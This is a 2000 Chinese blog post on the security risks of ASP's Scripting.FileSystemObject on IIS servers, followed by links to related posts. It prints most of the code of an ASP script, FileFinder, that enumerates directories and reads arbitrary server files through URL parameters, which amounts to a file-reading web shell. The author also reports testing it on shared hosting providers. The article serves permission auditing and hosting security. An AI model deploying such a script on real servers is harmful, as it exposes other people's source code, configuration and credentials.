ASP 中Scripting.FileSystemObject 对象对 IIS WEB 服务器数据安全的威胁及对策

原创 2000年12月30日 02:15:00
 

Edward Yang (edyang75@sina.com)<?xml:namespace prefix = o ns = "urn:schemas-microsoft-com:office:office" />

 

Scripting.FileSystemObject 对象是由 SCRRUN.DLL  提供的许多供 VBScript/Jscript 控制的 COM 对象之一。Scripting.FileSystemObject 提供了非常便利的文本文件和文件目录的访问,但是同时也对 IIS WEB 服务器数据安全造成了一定的威胁。

 

在继续深入讨论之前,请先到作者的主页http://263.csdn.net/edyang/ Download Source 分栏下载 FileFinder ASP 源代码。

 

FileFinder 的代码很简单,由3 个函数和 30 行左右的顺序代码构成。

 

最关键的是 FindFiles 函数,通过对它的递归调用实现对某个目录的遍历,并且按照特定的文件扩展名来搜寻这些文件。

 

Function FindFiles(strStartFolder, strExt)

        Dim n

        Dim oThisFolder

        Dim oFolders

        Dim oFiles

        Dim oFolder

        Dim oFile

 

        ' 如果系统管理员对文件系统的权限进行细致的设置话,下面的代码就要出错

        ' 但是有些目录还是可以察看的,所以我们简单的把错误忽略过去

        On Error Resume Next

        n = 0

        Response.Write "<b>Searching " & strStartFolder & "</b><br>"

        Set oThisFolder = g_fs.GetFolder(strStartFolder)

        Set oFiles = oThisFolder.Files

        For Each oFile In oFiles

                ' 如果是指定的文件扩展名,输出连接导向本身,但用不同的命令 cmd

                ' 在这里是 cmd=read,即读出指定物理路径的文本文件

                If IsSuffix(oFile.Path, strExt) Then

                    Response.Write "<a target=_blank href='ff.asp?cmd=read&path=" & Server.HTMLEncode(oFile.Path) & "'><font color='dodgerblue'>" & oFile.Path & "</font></a><br>"

                    If Err = 0 Then

                            n = n + 1

                    End If

                End If

        Next

        Set oFolders = oThisFolder.SubFolders

        For Each oFolder In oFolders

                n = n + FindFiles(oFolder.Path, strExt)

        Next

        FindFiles = n

End Function

 

下面的代码是对 URL 后面的参数进行分析:

 

' 读出各个参数的值

strCMD = Ucase(Request.QueryString("cmd"))

strPath = Request.QueryString("path")

strExt = Request.QueryString("ext")

bRawData = UCase(Request.QueryString("raw"))

 

' 默认搜索 .ASP 文件

If strPath = "" Then

        strPath = "."

End If

If strExt = "" Then

        strExt = ".asp"

End If

 

' 根据不同的命令 cmd 执行不同的代码

Select Case strCMD

Case "FIND"

        Response.Write FindFiles(strPath, strExt) & " file(s) found"

Case "READ"

        If bRawData = "T" Then

                Response.Write ReadTextFile(strPath)

        Else

                Response.Write "<pre>" & Server.HTMLEncode(ReadTextFile(strPath)) & "</pre>"

        End If

Case Else

        Response.Write "<h3>Please specify a command to execute</h3>"

End Select

 

从上面的分析可以看出,如果有足够的权限的话,我们就可以通过 FileFinder 来查找 IIS WEB 服务器上的任意文本文件,并且可以轻松的察看文件内容。对于非文本文件,可以确定他们是否存在及其所在路径,这对于高级 Hacker 们来说,这些信息有时是极其重要的。

 

但是这些对数据安全的威胁的前提条件是执行 FF.ASP 的用户至少拥有读取目录和文件的权限。由于 Windows NT Server 在安装后的默认安全设置是所有用户都可以“读取”目录和文件,所以不管是 IIS 默认的你名用户 IUSR_servername 还是别的什么用户,都可以顺列的读取目录和文件的信息。而大多数 Windows NT Server系统管理员主要关心系统是否能够运行的起来,一般不愿意去改动默认的目录和文件权限,毕竟那样做要冒很大的风险,而且需要很多次得经验。所以,我们可以用 FileFinder 来检查作为 WEB 服务器的 NT Server 的文件系统的安全设置是否安全。

 

作者专门对作为 IIS WEB 服务器的文件系统的权限进行了人工设置,但限于没有经验,导致了许多奇怪的错误现象,如:所用的做实验的 NT Server 4.0 不能进行 Access 数据库的连接。而在进行文件系统权限改动之前,这些功能是正常的。

 

本着纯粹研究的目的,作者还在我所申请的免费 ASP 空间上作了试验(包括 CSDN 提供的我的个人主页),结果是 FileFinder 都可以顺利运行。而在http://www2.domaindlx.com/index.html 申请的个人主页却没有这个问题,可见这个免费 ASP 主页提供商在这方面做的还是比较认真的。尽管 domaindlx WEB 服务器运行在 Windows 2000 Server 上的,其默认的文件系统的安全权限和 NT 4.0 没有很大的差别。

 

由于作者的能力有限,就对这个问题讨论到这里。仅以此文来向国内的 ASP 主页提供商提供参考意见,希望能对提供商和客户双方的数据安全都有所帮助。

 

附:用其它类似的服务器端脚本来运行的 WEB 服务,如果也提供类似 Scripting.FileSystemObject 的对文件系统操作的功能,不管什么平台应该存在同样的问题。

关于IIS无法创建'Scripting.FileSystemObject'对象

上周不知道安装过什么软件或是什么配置,造成公司的IIS服务器中的所有ASP文件中的'Scripting.FileSystemObject'对象无法创建。经过用探针程序的探测发现'Scripting.F...
  • e_zhiwen
  • e_zhiwen
  • 2010年11月14日 13:51
  • 4266

如何安装Scripting.FileSystemObject组件和三种禁用FileSystemObject组件的方法

安装FSO。 在JAVASCRIPT中创建Scripting.FileSystemObject对象:  var objFile = new ActiveXObject("Scripting.Fi...
  • zengxin2008
  • zengxin2008
  • 2012年01月09日 15:45
  • 7107

在使用Scripting.FileSystemObject 的时候报错automation服务器不能创建对象

在使用Scripting.FileSystemObject 的时候报错automation服务器不能创建对象的解决办法...
  • Gavid0124
  • Gavid0124
  • 2014年11月25日 08:58
  • 2417

威胁建模 Web 应用程序

威胁建模 Web 应用程序 本指南包含以下模块: • Web 应用程序威胁模型一览 • How To:在设计时为 Web 应用程序创建威胁模型 ...
  • jjkliu
  • jjkliu
  • 2014年10月29日 16:35
  • 897

IIS7以上版本服务器支持ASP的设置

IIS7以上版本服务器支持ASP的设置
  • xxgao
  • xxgao
  • 2015年03月04日 11:17
  • 434

如何在Windows7下配置ASP服务器IIS

在百度经验中浏览:http://jingyan.baidu.com/article/5553fa82ed97c765a23934f3.htmlInternet Information Services...
  • testcs_dn
  • testcs_dn
  • 2014年10月23日 23:15
  • 2498

asp下Scripting.FileSystemObject 的文件复制,删除,移动操作

‘创建一个FileSystemObject的事例Set MyFileObject=Server.CreateObject(“Scripting.FileSystemObject”)‘创建一个要进行操作...
  • lvlingwy
  • lvlingwy
  • 2007年05月30日 15:11
  • 1832

常见Web应用攻击原理与威胁分析

攻击一:代码执行攻击描述  当输出或者触发服务器端代码时,漏洞植入到代码中。在有些不严密的Web应用程序中,用户可以通过修改应用程序发布到留言板或留言簿,有时可能是注入的应用程序本身的脚本语言代码的服...
  • miromelo
  • miromelo
  • 2010年12月08日 20:40
  • 5009

使用iis6的web园,提升程序情能

如果你的服务器一天只有千来人访问,你是很难发现这个错误信息的,但如果你的网站每天有上十万人访问,高峰期并发线程上百个的时候,你会发现一大堆问题便出现了(对于用ASP或ASP.NET的站点,纯静态的不会...
  • ulark
  • ulark
  • 2010年06月10日 12:10
  • 719

VS2013无法启动 IIS Express Web的解决方法(全程图解)

不要勾选【覆盖应用程序根URL(U)】,或让【覆盖应用程序根URL(U)】下面的输入框和上面的输入框的地址一样! 使用VS2013有一段时间了,因前期都是编写C/S程序,没有使用到B/S调试器。前几...
  • fengsuifeng___
  • fengsuifeng___
  • 2015年10月27日 11:07
  • 1778
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:ASP 中Scripting.FileSystemObject 对象对 IIS WEB 服务器数据安全的威胁及对策
举报原因:
原因补充:

(最多只允许输入30个字)